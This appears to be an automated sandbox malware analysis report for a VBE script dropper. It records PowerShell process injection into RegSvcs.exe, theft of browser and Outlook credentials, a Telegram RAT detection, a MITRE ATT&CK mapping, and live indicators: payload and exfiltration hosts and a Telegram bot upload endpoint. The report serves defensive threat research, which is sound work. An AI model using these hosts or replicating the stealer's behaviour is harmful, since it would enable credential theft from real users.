                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
                Source: Yara matchFile source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
                Source: Yara matchFile source: 12.2.RegSvcs.exe.1160000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5184, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information211
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                211
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Exploitation for Client Execution
                1
                DLL Side-Loading
                311
                Process Injection
                2
                Obfuscated Files or Information
                LSASS Memory14
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)1
                DLL Side-Loading
                Security Account Manager1
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Masquerading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                Virtualization/Sandbox Evasion
                LSA Secrets21
                Virtualization/Sandbox Evasion
                SSHKeylogging23
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                Process Injection
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Rundll32
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557622 Sample: Ref#150062.vbe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 jertcot.shop 2->37 39 2 other IPs or domains 2->39 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Yara detected Telegram RAT 2->57 61 4 other signatures 2->61 8 wscript.exe 2->8         started        11 wscript.exe 12 2->11         started        14 wscript.exe 2->14         started        16 rundll32.exe 2->16         started        signatures3 59 Tries to detect the country of the analysis system (by using the IP) 35->59 process4 dnsIp5 63 Wscript starts Powershell (via cmd or directly) 8->63 65 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->65 18 powershell.exe 8->18         started        21 powershell.exe 39 8->21         started        47 144.91.79.54, 49730, 49731, 49732 CONTABODE Germany 11->47 67 System process connects to network (likely due to code injection or exploit) 11->67 69 Potential evasive VBS script found (sleep loop) 11->69 71 Suspicious execution chain found 11->71 signatures6 process7 signatures8 49 Writes to foreign memory regions 18->49 51 Injects a PE file into a foreign processes 18->51 23 RegSvcs.exe 15 2 18->23         started        27 wermgr.exe 19 18->27         started        29 conhost.exe 18->29         started        31 wermgr.exe 19 21->31         started        33 conhost.exe 21->33         started        process9 dnsIp10 41 jertcot.shop 162.254.34.31, 49932, 587 VIVIDHOSTINGUS United States 23->41 43 checkip.dyndns.com 193.122.6.168, 49883, 80 ORACLE-BMC-31898US United States 23->43 45 reallyfreegeoip.org 188.114.96.3, 443, 49889 CLOUDFLARENETUS European Union 23->45 73 Tries to steal Mail credentials (via file / registry access) 23->73 75 Tries to harvest and steal browser information (history, passwords, etc) 23->75 signatures11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Ref#150062.vbe3%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://144.91.79.54/1211/Y0%Avira URL Cloudsafe
                http://144.91.79.54/H0%Avira URL Cloudsafe
                http://144.91.79.54/1211/cng0%Avira URL Cloudsafe
                http://144.91.79.54/1211/r0%Avira URL Cloudsafe
                http://144.91.79.54/ll0%Avira URL Cloudsafe
                http://jertcot.shopd0%Avira URL Cloudsafe
                http://144.91.79.54/1211/s0%Avira URL Cloudsafe
                http://144.91.79.54:80/1211/file0%Avira URL Cloudsafe
                http://jertcot.shop0%Avira URL Cloudsafe
                http://144.91.79.54/00%Avira URL Cloudsafe
                http://144.91.79.54/1211/cn0%Avira URL Cloudsafe
                http://144.91.79.54/80%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.96.3
                truefalse
                  high
                  jertcot.shop
                  162.254.34.31
                  truetrue
                    unknown
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/155.94.241.187false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/botRegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://144.91.79.54/1211/cngwscript.exe, 00000000.00000003.1816534726.0000014AD4DAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1814678830.0000014AD4DA0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://jertcot.shopdRegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://reallyfreegeoip.orgdRegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://144.91.79.54/1211/Ywscript.exe, 00000000.00000003.1855170962.0000014AD4D72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1850754950.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860544185.0000014AD4D73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851807052.0000014AD4D69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://checkip.dyndns.orgRegSvcs.exe, 0000000C.00000002.2951280494.000000000314E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://jertcot.shopRegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://144.91.79.54/llwscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/155.94.241.187lRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.comdRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://144.91.79.54/1211/rwscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1851523290.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1857344788.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1853417170.0000014AD6AB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860821496.0000014AD6AB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1719027708.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852166734.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://144.91.79.54/Hwscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://checkip.dyndns.org/qRegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://144.91.79.54/wscript.exe, 00000000.00000003.1718508588.0000014AD4D89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718673514.0000014AD4D97000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://144.91.79.54:80/1211/filewscript.exe, 00000000.00000003.1852355017.0000014AD4D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1852640806.0000014AD4D0C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1854323961.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1860304459.0000014AD4D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://reallyfreegeoip.orgRegSvcs.exe, 0000000C.00000002.2951280494.000000000317D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.orgdRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://144.91.79.54/0wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://144.91.79.54/1211/swscript.exe, 00000000.00000003.1698784880.0000014AD4D56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://checkip.dyndns.comRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://144.91.79.54/1211/cnwscript.exe, 00000000.00000003.1816091185.0000014AD6AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://checkip.dyndns.org/dRegSvcs.exe, 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000C.00000002.2951280494.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://reallyfreegeoip.org/xml/155.94.241.187dRegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
                                                          http://144.91.79.54/8wscript.exe, 00000000.00000003.1698854743.0000014AD4D31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/RegSvcs.exe, 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2951280494.0000000003160000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            144.91.79.54
                                                            unknownGermany
                                                            51167CONTABODEtrue
                                                            193.122.6.168
                                                            checkip.dyndns.comUnited States
                                                            31898ORACLE-BMC-31898USfalse
                                                            188.114.96.3
                                                            reallyfreegeoip.orgEuropean Union
                                                            13335CLOUDFLARENETUSfalse
                                                            162.254.34.31
                                                            jertcot.shopUnited States
                                                            64200VIVIDHOSTINGUStrue
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1557622
                                                            Start date and time:2024-11-18 13:42:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 16s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:16
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Ref#150062.vbe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winVBE@16/19@3/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 99%
                                                            • Number of executed functions: 28
                                                            • Number of non-executed functions: 46
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbe
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                            • Excluded domains from analysis (whitelisted): licensing.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Ref#150062.vbe
                                                            TimeTypeDescription
                                                            07:42:59API Interceptor12x Sleep call for process: wscript.exe modified
                                                            07:44:07API Interceptor124x Sleep call for process: powershell.exe modified
                                                            07:44:29API Interceptor20x Sleep call for process: RegSvcs.exe modified
                                                            07:44:43API Interceptor2x Sleep call for process: wermgr.exe modified
                                                            12:43:12Task SchedulerRun new task: pcPseOUmXnpEaeF path: C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            144.91.79.54BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                            • 144.91.79.54/1211/file
                                                            Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                                            • 144.91.79.54/0911/file
                                                            SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                            • 144.91.79.54/0911/file
                                                            Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                            • 144.91.79.54/0911/file
                                                            MV EAGLE EYE RFQ-92008882920-PDF.vbsGet hashmaliciousUnknownBrowse
                                                            • 144.91.79.54/2210/file
                                                            Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                            • 144.91.79.54/2210/file
                                                            Chronopost_FormulaireAdresse.vbsGet hashmaliciousAsyncRATBrowse
                                                            • 144.91.79.54/2210/file
                                                            Ref#150689.vbeGet hashmaliciousAgentTeslaBrowse
                                                            • 144.91.79.54/1210/file
                                                            INQ887721122.vbsGet hashmaliciousUnknownBrowse
                                                            • 144.91.79.54/1210/file
                                                            INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 144.91.79.54/1210/file
                                                            193.122.6.168DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • checkip.dyndns.org/
                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • checkip.dyndns.org/
                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            rFACTURASALBARANESPENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                            • checkip.dyndns.org/
                                                            CloudServices_Slayed.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • checkip.dyndns.org/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            reallyfreegeoip.orgDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 188.114.97.3
                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.97.3
